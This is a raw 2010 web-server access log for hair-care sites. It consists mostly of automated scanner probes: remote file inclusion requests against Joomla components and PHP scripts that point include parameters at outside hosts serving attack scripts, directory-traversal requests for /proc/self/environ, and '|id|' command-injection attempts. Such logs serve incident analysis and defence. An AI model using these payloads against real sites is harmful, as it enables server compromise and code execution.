66.84.0.141 - - [17/May/2010:21:51:48 -0700] "GET /logs/access_100315.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.84.0.141 - - [17/May/2010:21:51:48 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.84.0.141 - - [17/May/2010:21:51:48 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:21:56:21 -0700] "GET /logs/access_100412.log/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:21:56:21 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:21:56:21 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:21:58:15 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13652 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
211.189.18.242 - - [17/May/2010:21:59:24 -0700] "GET /logs/access_100208.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:21:59:24 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:21:59:25 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:22:02:45 -0700] "GET /logs/access_100412.log/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:22:02:45 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:22:02:46 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:22:03:12 -0700] "GET /logs/access_100426.log/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:22:06:45 -0700] "GET /logs/access_091026.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:22:06:45 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:22:06:46 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:22:10:30 -0700] "GET /logs/access_091012.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:22:12:02 -0700] "GET /logs/access_100315.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:22:14:34 -0700] "GET /logs/access_091116.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:22:17:35 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:22:17:35 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:22:17:35 -0700] "GET /logs/access_091221.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:22:17:37 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:22:17:37 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:22:17:37 -0700] "GET /logs/access_091221.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:22:18:25 -0700] "GET /logs/access_091221.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:22:18:25 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:22:18:25 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:22:19:29 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:22:19:29 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:22:19:29 -0700] "GET /logs/access_091221.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:22:21:45 -0700] "GET /logs/access_091221.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:22:21:46 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:22:21:46 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:22:23:58 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13704 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
111.89.128.186 - - [17/May/2010:22:25:45 -0700] "GET /logs/access_100208.log/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:22:25:45 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:22:25:45 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:22:29:59 -0700] "GET //appserv/main.php/?appserv_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:22:29:59 -0700] "GET /logs/access_100125.log///appserv/main.php/?appserv_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:22:30:00 -0700] "GET /logs///appserv/main.php/?appserv_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:22:30:23 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 200 928 "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:22:30:23 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 200 5379 "-" "libwww-perl/5.805" "growlonghairfast.com"
124.115.6.16 - - [17/May/2010:22:44:38 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.freehairsecrets.com"
77.88.25.28 - - [17/May/2010:22:49:05 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14971 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
91.121.20.59 - - [17/May/2010:22:50:54 -0700] "GET /index2.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:22:51:20 -0700] "GET //appserv/main.php/?appserv_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:22:51:20 -0700] "GET /logs/access_100125.log///appserv/main.php/?appserv_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:22:51:39 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13289 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
119.63.193.75 - - [17/May/2010:22:55:14 -0700] "GET /freehairsecretsphp/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "freehairsecrets.com"
119.63.193.75 - - [17/May/2010:22:57:15 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17234 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "freehairsecrets.com"
91.121.20.59 - - [17/May/2010:22:58:00 -0700] "GET /logs/access.log/index2.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.121.20.59 - - [17/May/2010:22:58:00 -0700] "GET /index2.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.121.20.59 - - [17/May/2010:22:58:00 -0700] "GET /logs/index2.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:22:59:03 -0700] "GET /logs/access_100419.log/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:22:59:03 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:22:59:04 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.121.20.59 - - [17/May/2010:23:05:20 -0700] "GET /logs/access_100510.log/index2.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:23:13:14 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14529 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
124.0.74.195 - - [17/May/2010:23:14:08 -0700] "GET /logs/access_100104.log%20%20///appserv/main.php/?appserv_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:23:14:08 -0700] "GET /logs///appserv/main.php/?appserv_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:23:14:08 -0700] "GET //appserv/main.php/?appserv_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:23:19:57 -0700] "GET //appserv/main.php/?appserv_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.0.74.195 - - [17/May/2010:23:19:57 -0700] "GET /logs///appserv/main.php/?appserv_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.0.74.195 - - [17/May/2010:23:19:58 -0700] "GET /logs/access.log%20%20///appserv/main.php/?appserv_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.206.183.174 - - [17/May/2010:23:29:07 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
91.206.183.174 - - [17/May/2010:23:29:07 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
67.195.111.220 - - [17/May/2010:23:31:04 -0700] "GET /?S=D HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:23:32:18 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18786 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:23:37:55 -0700] "GET /freehairsecretsphp/viewtopic.php?p=3173 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.195.114.22 - - [17/May/2010:23:43:15 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
91.121.142.187 - - [17/May/2010:23:47:15 -0700] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.142.187 - - [17/May/2010:23:48:11 -0700] "GET /logs/access_100201.log/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.142.187 - - [17/May/2010:23:48:11 -0700] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.142.187 - - [17/May/2010:23:48:11 -0700] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
87.252.3.123 - - [17/May/2010:23:49:44 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.anaiscolin.com//components/com_artforms/assets/captcha/includes/captchaform/idv6.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
87.252.3.123 - - [17/May/2010:23:49:45 -0700] "GET /logs/access_100510.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.anaiscolin.com//components/com_artforms/assets/captcha/includes/captchaform/idv6.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
87.252.3.123 - - [17/May/2010:23:49:45 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.anaiscolin.com//components/com_artforms/assets/captcha/includes/captchaform/idv6.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
77.88.25.28 - - [18/May/2010:00:02:09 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14575 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
88.191.94.188 - - [18/May/2010:00:02:54 -0700] "GET /send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.191.94.188 - - [18/May/2010:00:02:54 -0700] "GET /logs/send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.191.94.188 - - [18/May/2010:00:02:54 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.191.94.188 - - [18/May/2010:00:03:31 -0700] "GET /logs/send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.191.94.188 - - [18/May/2010:00:03:31 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.191.94.188 - - [18/May/2010:00:03:31 -0700] "GET /send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.218.116.134 - - [18/May/2010:00:04:29 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "freehairsecrets.com"
87.252.3.123 - - [18/May/2010:00:07:04 -0700] "GET /logs/access_100510.log//include/mail.inc.php?root=http://www.anaiscolin.com//components/com_artforms/assets/captcha/includes/captchaform/idv6.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
87.252.3.123 - - [18/May/2010:00:07:04 -0700] "GET /include/mail.inc.php?root=http://www.anaiscolin.com//components/com_artforms/assets/captcha/includes/captchaform/idv6.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
87.252.3.123 - - [18/May/2010:00:07:04 -0700] "GET /logs//include/mail.inc.php?root=http://www.anaiscolin.com//components/com_artforms/assets/captcha/includes/captchaform/idv6.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
77.88.25.28 - - [18/May/2010:00:11:39 -0700] "GET /logs/access_100329.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
119.63.198.118 - - [18/May/2010:00:17:42 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13728 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.freehairsecrets.com"
119.63.198.93 - - [18/May/2010:00:17:47 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12614 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.freehairsecrets.com"
69.168.54.22 - - [18/May/2010:00:24:33 -0700] "GET /%7Cid%7C HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [18/May/2010:00:25:58 -0700] "GET /logs/access_091130.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
80.179.153.117 - - [18/May/2010:00:26:17 -0700] "GET /%7Cid%7C HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
119.148.64.114 - - [18/May/2010:00:29:26 -0700] "GET /%7Cid%7C HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
122.249.22.58 - - [18/May/2010:00:30:25 -0700] "GET /%7Cid%7C HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
69.168.54.22 - - [18/May/2010:00:33:39 -0700] "GET /logs/scripts.log/%7Cid%7C HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.168.54.22 - - [18/May/2010:00:33:39 -0700] "GET /%7Cid%7C HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.168.54.22 - - [18/May/2010:00:33:39 -0700] "GET /logs/%7Cid%7C HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.133.201.194 - - [18/May/2010:00:34:37 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
